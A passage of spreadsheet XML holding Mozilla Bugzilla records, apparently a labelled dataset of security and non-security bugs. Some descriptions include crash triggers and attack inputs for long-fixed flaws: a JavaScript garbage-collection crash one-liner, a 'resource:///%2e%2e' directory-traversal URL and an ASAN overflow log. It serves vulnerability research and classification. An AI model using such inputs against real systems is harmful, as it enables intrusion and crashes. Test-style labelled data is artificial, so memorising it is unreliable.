      <c r="F2932" t="n">
        <v>1</v>
      </c>
      <c r="G2932" t="n">
        <v>3</v>
      </c>
      <c r="H2932" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2932" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2932" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2932" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2932" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2932" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2932" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2932" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2932" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2932" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2932" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2932" t="inlineStr">
        <is>
          <t>mozilla1.8.1</t>
        </is>
      </c>
      <c r="T2932" t="n">
        <v>1</v>
      </c>
      <c r="U2932" t="n">
        <v>0</v>
      </c>
      <c r="V2932" t="n">
        <v>16</v>
      </c>
      <c r="W2932" t="inlineStr">
        <is>
          <t>js&gt; y = ({toString: gc}); new Function("y--;")()
Causes a crash [@ js_GetGCThingFlags] at the line 
  offsetInArena = pi-&gt;offsetInArena
gdb says
  thing == 0xdadadad8
  pi == (JSGCPageInfo *) 0xdadad800
I can get a similar crash without the "toString: gc" thing if I enable WAY_TOO_MUCH_GC.</t>
        </is>
      </c>
      <c r="X2932" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2933">
      <c r="A2933" t="n">
        <v>394075</v>
      </c>
      <c r="B2933" t="inlineStr">
        <is>
          <t>2007-08-28 15:36:23 -0700</t>
        </is>
      </c>
      <c r="C2933" t="inlineStr">
        <is>
          <t>Resource Directory Traversal Vulnerability</t>
        </is>
      </c>
      <c r="D2933" t="inlineStr">
        <is>
          <t>2008-09-30 22:47:31 -0700</t>
        </is>
      </c>
      <c r="E2933" t="n">
        <v>1</v>
      </c>
      <c r="F2933" t="n">
        <v>1</v>
      </c>
      <c r="G2933" t="n">
        <v>2</v>
      </c>
      <c r="H2933" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2933" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2933" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2933" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2933" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2933" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2933" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2933" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2933" t="inlineStr">
        <is>
          <t>[sg:nse] fix in bug 380994</t>
        </is>
      </c>
      <c r="Q2933" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2933" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2933" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2933" t="n">
        <v>1</v>
      </c>
      <c r="U2933" t="n">
        <v>1</v>
      </c>
      <c r="V2933" t="n">
        <v>10</v>
      </c>
      <c r="W2933" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; it; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Classical Traversal Vulnerability, maybe someone forgot some filters ...
It could be dangerous if someone open a "well forged" page.
Reproducible: Always
Steps to Reproduce:
1.Write this "resource:///%2e%2e" (Without ") in your UR
2.
3.
Actual Results:  
You can navigate  your file system !
Expected Results:  
The software forgets some filters in resource procedure</t>
        </is>
      </c>
      <c r="X2933" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2934">
      <c r="A2934" t="n">
        <v>1681724</v>
      </c>
      <c r="B2934" t="inlineStr">
        <is>
          <t>2020-12-10 05:57:17 -0800</t>
        </is>
      </c>
      <c r="C2934" t="inlineStr">
        <is>
          <t>Multithreaded Wasm hits compartment mismatch crash with Warp changes</t>
        </is>
      </c>
      <c r="D2934" t="inlineStr">
        <is>
          <t>2021-11-22 23:34:25 -0800</t>
        </is>
      </c>
      <c r="E2934" t="n">
        <v>1</v>
      </c>
      <c r="F2934" t="n">
        <v>1</v>
      </c>
      <c r="G2934" t="n">
        <v>3</v>
      </c>
      <c r="H2934" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2934" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2934" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K2934" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2934" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2934" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2934" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2934" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2934" t="inlineStr">
        <is>
          <t>[adv-main86+][sec-survey]</t>
        </is>
      </c>
      <c r="Q2934" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2934" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2934" t="inlineStr">
        <is>
          <t>87 Branch</t>
        </is>
      </c>
      <c r="T2934" t="n">
        <v>1</v>
      </c>
      <c r="U2934" t="n">
        <v>0</v>
      </c>
      <c r="V2934" t="n">
        <v>37</v>
      </c>
      <c r="W2934" t="inlineStr">
        <is>
          <t>## Summary
A multithreaded Wasm project I am working on has started crashing in recent Firefox versions with a compartment mismatch. `mozregression` identified bug 1660862 (https://hg.mozilla.org/integration/autoland/rev/4d530fda38c294549a80f51db315c9279fdbec77) as the cause.
## STR
1. Clone the demo repo at https://github.com/jryans/wasm-warp-compartment-mismatch
2. `yarn install` (to get a local HTTP server with COOP / COEP headers)
3. `yarn serve`
4. Go to http://localhost:5000
5. Wait ~10s for the large Wasm blob to download
6. Crash (reproduces every time)
## Notes
* Opening the browser DevTools somehow prevents the crash (perhaps because the debugger sets the JIT down a different path)
## Crash reports
* https://crash-stats.mozilla.org/report/index/490a9c3a-53a9-464f-835c-ca7ef0201210
* https://crash-stats.mozilla.org/report/index/2fb6a7f8-941e-4574-800c-bc0da0201210
* https://crash-stats.mozilla.org/report/index/b7111bdd-e17e-4f03-a329-a06280201210
* https://crash-stats.mozilla.org/report/index/f86abc5f-ebb1-4e9d-9c4a-429c30201210
* https://crash-stats.mozilla.org/report/index/ba14e939-4ebf-4aa9-9d86-a8cd20201210
* https://crash-stats.mozilla.org/report/index/605f946a-437e-4cba-872d-214ee0201210</t>
        </is>
      </c>
      <c r="X2934" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2935">
      <c r="A2935" t="n">
        <v>646662</v>
      </c>
      <c r="B2935" t="inlineStr">
        <is>
          <t>2011-03-30 15:44:05 -0700</t>
        </is>
      </c>
      <c r="C2935" t="inlineStr">
        <is>
          <t>###!!! ASSERTION: This is unsafe! Fix the caller! in nsEventDispatcher</t>
        </is>
      </c>
      <c r="D2935" t="inlineStr">
        <is>
          <t>2011-08-10 10:50:24 -0700</t>
        </is>
      </c>
      <c r="E2935" t="n">
        <v>1</v>
      </c>
      <c r="F2935" t="n">
        <v>1</v>
      </c>
      <c r="G2935" t="n">
        <v>3</v>
      </c>
      <c r="H2935" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2935" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2935" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2935" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2935" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2935" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2935" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2935" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2935" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed on trunk by 650493 [qa-examined-192]</t>
        </is>
      </c>
      <c r="Q2935" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2935" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2935" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2935" t="n">
        <v>1</v>
      </c>
      <c r="U2935" t="n">
        <v>0</v>
      </c>
      <c r="V2935" t="n">
        <v>36</v>
      </c>
      <c r="W2935" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Build Identifier: 
Description:
The attached testcase triggers following assertion on debug builds:
 ###!!! ASSERTION: This is unsafe! Fix the caller!
A stack back trace at the time of the assertion is attached. Additionally exploitable looking crashes have been observed on Linux, Windows and Mac.
The reduced test case needs a few reloads to crash the browser (especially on windows). The likelihood of crashes can be increased by loading the testcase in several tabs and iframes. Regardless of the crashes, the assertion seem to happen for every reload.
Affected Versions:
Firefox 4.0
Trunk
Testcase:
The testcase is attached as an HTML file. It will crash the browser on opening after several reloads. 
Testcase Notes:
gc() triggers garbage collection. It requires Jesse's quitter extension (https://www.squarefree.com/extensions/quitter.xpi).
Stack Backtrace:
The stack during the first assertion on Linux is attached.
VulnDev reference    : vd11007
reported by nils of vulndev ltd.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X2935" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2936">
      <c r="A2936" t="n">
        <v>701269</v>
      </c>
      <c r="B2936" t="inlineStr">
        <is>
          <t>2011-11-09 18:48:26 -0800</t>
        </is>
      </c>
      <c r="C2936" t="inlineStr">
        <is>
          <t>WebGL / Canvas displaying uninitialized video memory.</t>
        </is>
      </c>
      <c r="D2936" t="inlineStr">
        <is>
          <t>2012-04-10 21:27:57 -0700</t>
        </is>
      </c>
      <c r="E2936" t="n">
        <v>1</v>
      </c>
      <c r="F2936" t="n">
        <v>1</v>
      </c>
      <c r="G2936" t="n">
        <v>3</v>
      </c>
      <c r="H2936" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2936" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2936" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2936" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2936" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2936" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2936" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2936" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2936" t="inlineStr">
        <is>
          <t>[sg:vector-high][qa-]</t>
        </is>
      </c>
      <c r="Q2936" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2936" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2936" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T2936" t="n">
        <v>1</v>
      </c>
      <c r="U2936" t="n">
        <v>0</v>
      </c>
      <c r="V2936" t="n">
        <v>71</v>
      </c>
      <c r="W2936" t="inlineStr">
        <is>
          <t>Created attachment 573407
HTML page that reproduces bug and screenshot.
Setting the canvas width and height properties AFTER you get an webgl context can lead to reading of arbitrary video data, desktop images, other tabs, etc. This seems to occur on MacBook Airs, and not on MacBook Pros. This occurs in Firefox 6.0.2, as well as Nightly.
Machine
=======
  Model Name:	MacBook Air
  Model Identifier:	MacBookAir4,2
  Processor Name:	Intel Core i7
  Processor Speed:	1.8 GHz
  Number of Processors:	1
  Total Number of Cores:	2
  L2 Cache (per Core):	256 KB
  L3 Cache:	4 MB
  Memory:	4 GB
  Boot ROM Version:	MBA41.0077.B0E
  SMC Version (system):	1.73f63
about:support
=============
Adapter Description: 0x24300,0x20400
WebGL Renderer: Intel Inc. -- Intel HD Graphics 3000 OpenGL Engine -- 2.1 APPLE-7.12.9GPU 
Accelerated Windows: 1/1 OpenGL</t>
        </is>
      </c>
      <c r="X2936" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2937">
      <c r="A2937" t="n">
        <v>284627</v>
      </c>
      <c r="B2937" t="inlineStr">
        <is>
          <t>2005-03-03 08:25:41 -0800</t>
        </is>
      </c>
      <c r="C2937" t="inlineStr">
        <is>
          <t>arbitrary code execution via sidebar</t>
        </is>
      </c>
      <c r="D2937" t="inlineStr">
        <is>
          <t>2011-08-05 22:34:00 -0700</t>
        </is>
      </c>
      <c r="E2937" t="n">
        <v>1</v>
      </c>
      <c r="F2937" t="n">
        <v>1</v>
      </c>
      <c r="G2937" t="n">
        <v>2</v>
      </c>
      <c r="H2937" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2937" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2937" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2937" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2937" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2937" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2937" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2937" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2937" t="inlineStr">
        <is>
          <t>[sg:fix] CAN-2005-0402</t>
        </is>
      </c>
      <c r="Q2937" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2937" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2937" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2937" t="n">
        <v>1</v>
      </c>
      <c r="U2937" t="n">
        <v>0</v>
      </c>
      <c r="V2937" t="n">
        <v>31</v>
      </c>
      <c r="W2937" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b2) Gecko/20050302 Firefox/1.0+
Sidebar allows an attacker to link to the privileged content (such as
about:config) and run arbitrary code on the content.
Reproducible: Always
Steps to Reproduce:
1. Bookmark testcase as sidebar panel
2. Click links in order
Actual Results:  
about:config is loaded. "browser.startup.homepage" will be overwritten.
Further attacks can be done successfully.
Expected Results:  
Link to the privileged content should be blocked.</t>
        </is>
      </c>
      <c r="X2937" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2938">
      <c r="A2938" t="n">
        <v>808069</v>
      </c>
      <c r="B2938" t="inlineStr">
        <is>
          <t>2012-11-02 10:21:30 -0700</t>
        </is>
      </c>
      <c r="C2938" t="inlineStr">
        <is>
          <t>No images being shown on new mobile article page</t>
        </is>
      </c>
      <c r="D2938" t="inlineStr">
        <is>
          <t>2012-11-05 07:47:15 -0800</t>
        </is>
      </c>
      <c r="E2938" t="n">
        <v>1</v>
      </c>
      <c r="F2938" t="n">
        <v>1</v>
      </c>
      <c r="G2938" t="n">
        <v>5</v>
      </c>
      <c r="H2938" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2938" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2938" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K2938" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2938" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2938" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2938" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2938" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2938" t="inlineStr">
        <is>
          <t>u=user c=wiki p=1 s=2012.21</t>
        </is>
      </c>
      <c r="Q2938" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2938" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2938" t="inlineStr">
        <is>
          <t>2012Q4</t>
        </is>
      </c>
      <c r="T2938" t="n">
        <v>1</v>
      </c>
      <c r="U2938" t="n">
        <v>0</v>
      </c>
      <c r="V2938" t="n">
        <v>5</v>
      </c>
      <c r="W2938" t="inlineStr">
        <is>
          <t>Currently there are no articles being shown on the new mobile article page.</t>
        </is>
      </c>
      <c r="X2938" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2939">
      <c r="A2939" t="n">
        <v>921622</v>
      </c>
      <c r="B2939" t="inlineStr">
        <is>
          <t>2013-09-27 14:17:13 -0700</t>
        </is>
      </c>
      <c r="C2939" t="inlineStr">
        <is>
          <t>Intermittent ASAN heap-buffer-overflow in test_playback_rate.html</t>
        </is>
      </c>
      <c r="D2939" t="inlineStr">
        <is>
          <t>2018-10-01 11:13:42 -0700</t>
        </is>
      </c>
      <c r="E2939" t="n">
        <v>1</v>
      </c>
      <c r="F2939" t="n">
        <v>1</v>
      </c>
      <c r="G2939" t="n">
        <v>3</v>
      </c>
      <c r="H2939" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2939" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2939" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K2939" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2939" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2939" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2939" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2939" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2939" t="inlineStr">
        <is>
          <t>[adv-main30+][adv-esr24.6+][qa-]</t>
        </is>
      </c>
      <c r="Q2939" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2939" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2939" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T2939" t="n">
        <v>1</v>
      </c>
      <c r="U2939" t="n">
        <v>0</v>
      </c>
      <c r="V2939" t="n">
        <v>93</v>
      </c>
      <c r="W2939" t="inlineStr">
        <is>
          <t>Unfortunately, this doesn't fail in a TBPL-starrable way. Decoder, anything we can do about that?
https://tbpl.mozilla.org/php/getParsedLog.php?id=28460670&amp;tree=Mozilla-Inbound
Ubuntu ASAN VM 12.04 x64 mozilla-inbound opt test mochitest-1 on 2013-09-27 04:07:56 PDT for push 06f9ccafcf8b
slave: tst-linux64-ec2-373
04:43:57     INFO -  153499 INFO TEST-PASS | /tests/content/media/test/test_playback_rate.html | If we disable the pitch preservation, it should appear as such.
04:43:57     INFO -  153500 INFO TEST-PASS | /tests/content/media/test/test_playback_rate.html | The playback rate shoud be 0.25.vbr.mp3-5
04:43:57     INFO -  153501 INFO TEST-PASS | /tests/content/media/test/test_playback_rate.html | We are effectively slowing down playback. (18.025, 4.217999) for vbr.mp3-5
04:43:57     INFO -  153502 INFO TEST-PASS | /tests/content/media/test/test_playback_rate.html | Current time should not change when playbackRate is null (4.217999 4.217999).
04:43:57     INFO -  153503 INFO TEST-PASS | /tests/content/media/test/test_playback_rate.html | The element should not be in paused state.
04:43:57     INFO -  153504 INFO TEST-PASS | /tests/content/media/test/test_playback_rate.html | Paused event should not have been received.
04:43:57     INFO -  153505 INFO TEST-PASS | /tests/content/media/test/test_playback_rate.html | Playback rate should be clamped to 5.
04:43:58     INFO -  =================================================================
04:43:58     INFO -  ==2421==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f46b7bbe810 at pc 0x7f46f1bc4ad3 bp 0x7f46b04d1250 sp 0x7f46b04d1248
04:43:58     INFO -  WRITE of size 4 at 0x7f46b7bbe810 thread T85
04:43:58     INFO -      #0 0x7f46f1bc4ad2 (/builds/slave/test/build/application/firefox/libxul.so+0x63a7ad2)
04:43:58     INFO -      #1 0x7f46f1bc2c6e (/builds/slave/test/build/application/firefox/libxul.so+0x63a5c6e)
04:43:58     INFO -      #2 0x7f46f1bc5f95 (/builds/slave/test/build/application/firefox/libxul.so+0x63a8f95)
04:43:58     INFO -      #3 0x7f46ee298ab4 (/builds/slave/test/build/application/firefox/libxul.so+0x2a7bab4)
04:43:58     INFO -      #4 0x7f46ee298e36 (/builds/slave/test/build/application/firefox/libxul.so+0x2a7be36)
04:43:58     INFO -      #5 0x7f46f1bcc7a4 (/builds/slave/test/build/application/firefox/libxul.so+0x63af7a4)
04:43:58     INFO -      #6 0x44ccc3 (/builds/slave/test/build/application/firefox/firefox+0x44ccc3)
04:43:58     INFO -      #7 0x7f46fd0c4e99 (/lib/x86_64-linux-gnu/libpthread.so.0+0x7e99)
04:43:58     INFO -      #8 0x7f46fc1d5dbc (/lib/x86_64-linux-gnu/libc.so.6+0xf3dbc)
04:43:58     INFO -  0x7f46b7bbe810 is located 0 bytes to the right of 155664-byte region [0x7f46b7b98800,0x7f46b7bbe810)
04:43:58     INFO -  freed by thread T1362 (Media Audio) here:
04:43:58     INFO -      #0 0x446aa5 (/builds/slave/test/build/application/firefox/firefox+0x446aa5)
04:43:58     INFO -      #1 0x7f46f1bc0208 (/builds/slave/test/build/application/firefox/libxul.so+0x63a3208)
04:43:58     INFO -  previously allocated by thread T1362 (Media Audio) here:
04:43:58     INFO -      #0 0x4467f5 (/builds/slave/test/build/application/firefox/firefox+0x4467f5)
04:43:58     INFO -      #1 0x7f46f1bc0095 (/builds/slave/test/build/application/firefox/libxul.so+0x63a3095)
04:43:58     INFO -  Thread T85 created by T83 (Media Audio) here:
04:43:58     INFO -      #0 0x4375c1 (/builds/slave/test/build/application/firefox/firefox+0x4375c1)
04:43:58     INFO -      #1 0x7f46f1bcb061 (/builds/slave/test/build/application/firefox/libxul.so+0x63ae061)
04:43:58     INFO -      #2 0x7f46f1bca87f (/builds/slave/test/build/application/firefox/libxul.so+0x63ad87f)
04:43:58     INFO -      #3 0x7f46ee2e1b18 (/builds/slave/test/build/application/firefox/libxul.so+0x2ac4b18)
04:43:58     INFO -  Thread T83 (Media Audio) created by T76 (Media State) here:
04:43:58     INFO -      #0 0x4375c1 (/builds/slave/test/build/application/firefox/firefox+0x4375c1)
04:43:58     INFO -      #1 0x7f46f9ba6b35 (/builds/slave/test/build/application/firefox/libnspr4.so+0x6ab35)
04:43:58     INFO -      #2 0x7f46f9ba6687 (/builds/slave/test/build/application/firefox/libnspr4.so+0x6a687)
04:43:58     INFO -  Thread T76 (Media State) created by T0 here:
04:43:58     INFO -      #0 0x4375c1 (/builds/slave/test/build/application/firefox/firefox+0x4375c1)
04:43:58     INFO -      #1 0x7f46f9ba6b35 (/builds/slave/test/build/application/firefox/libnspr4.so+0x6ab35)
04:43:58     INFO -      #2 0x7f46f9ba6687 (/builds/slave/test/build/application/firefox/libnspr4.so+0x6a687)
04:43:58     INFO -  Thread T1362 (Media Audio) created by T1335 (Media State) here:
04:43:58     INFO -      #0 0x4375c1 (/builds/slave/test/build/application/firefox/firefox+0x4375c1)
04:43:58     INFO -      #1 0x7f46f9ba6b35 (/builds/slave/test/build/application/firefox/libnspr4.so+0x6ab35)
04:43:58     INFO -      #2 0x7f46f9ba6687 (/builds/slave/test/build/application/firefox/libnspr4.so+0x6a687)
04:43:58     INFO -  Thread T1335 (Media State) created by T0 here:
04:43:58     INFO -      #0 0x4375c1 (/builds/slave/test/build/application/firefox/firefox+0x4375c1)
04:43:58     INFO -      #1 0x7f46f9ba6b35 (/builds/slave/test/build/application/firefox/libnspr4.so+0x6ab35)
04:43:58     INFO -      #2 0x7f46f9ba6687 (/builds/slave/test/build/application/firefox/libnspr4.so+0x6a687)
04:43:58     INFO -  Shadow bytes around the buggy address:
04:43:58     INFO -    0x0fe956f6fcb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
04:43:58     INFO -    0x0fe956f6fcc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
04:43:58     INFO -    0x0fe956f6fcd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
04:43:58     INFO -    0x0fe956f6fce0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
04:43:58     INFO -    0x0fe956f6fcf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
04:43:58     INFO -  =&gt;0x0fe956f6fd00: fd fd[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
04:43:58     INFO -    0x0fe956f6fd10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
04:43:58     INFO -    0x0fe956f6fd20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
04:43:58     INFO -    0x0fe956f6fd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
04:43:58     INFO -    0x0fe956f6fd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
04:43:58     INFO -    0x0fe956f6fd50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
04:43:58     INFO -  Shadow byte legend (one shadow byte represents 8 application bytes):
04:43:58     INFO -    Addressable:           00
04:43:58     INFO -    Partially addressable: 01 02 03 04 05 06 07
04:43:58     INFO -    Heap left redzone:     fa
04:43:58     INFO -    Heap right redzone:    fb
04:43:58     INFO -    Freed heap region:     fd
04:43:58     INFO -    Stack left redzone:    f1
04:43:58     INFO -    Stack mid redzone:     f2
04:43:58     INFO -    Stack right redzone:   f3
04:43:58     INFO -    Stack partial redzone: f4
04:43:58     INFO -    Stack after return:    f5
04:43:58     INFO -    Stack use after scope: f8
04:43:58     INFO -    Global redzone:        f9
04:43:58     INFO -    Global init order:     f6
04:43:58     INFO -    Poisoned by user:      f7
04:43:58     INFO -    ASan internal:         fe
04:43:58     INFO -  ==2421==ABORTING</t>
        </is>
      </c>
      <c r="X2939" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2940">
      <c r="A2940" t="n">
        <v>22855</v>
      </c>
      <c r="B2940" t="inlineStr">
        <is>
          <t>1999-12-31 01:31:02 -0800</t>
        </is>
      </c>
      <c r="C2940" t="inlineStr">
        <is>
          <t>CC on remove</t>
        </is>
      </c>
      <c r="D2940" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E2940" t="n">
        <v>1</v>
      </c>
      <c r="F2940" t="n">
        <v>1</v>
      </c>
      <c r="G2940" t="n">
        <v>4</v>
      </c>
      <c r="H2940" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2940" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2940" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2940" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2940" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2940" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2940" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2940" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2940" t="inlineStr"/>
      <c r="Q2940" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2940" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2940" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T2940" t="n">
        <v>1</v>
      </c>
      <c r="U2940" t="n">
        <v>0</v>
      </c>
      <c r="V2940" t="n">
        <v>6</v>
      </c>
      <c r="W2940" t="inlineStr">
        <is>
          <t>If somebody takes a bug from me (assignes it to someone else) and doesn't add me
to cc (and I'm not otherwise in the to/cc list), I don't even notice.
Notify me, if I'm removed from the to/cc list in any way.</t>
        </is>
      </c>
      <c r="X2940" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2941">
      <c r="A2941" t="n">
        <v>748640</v>
      </c>
      <c r="B2941" t="inlineStr">
        <is>
          <t>2012-04-24 19:41:15 -0700</t>
        </is>
      </c>
      <c r="C2941" t="inlineStr">
        <is>
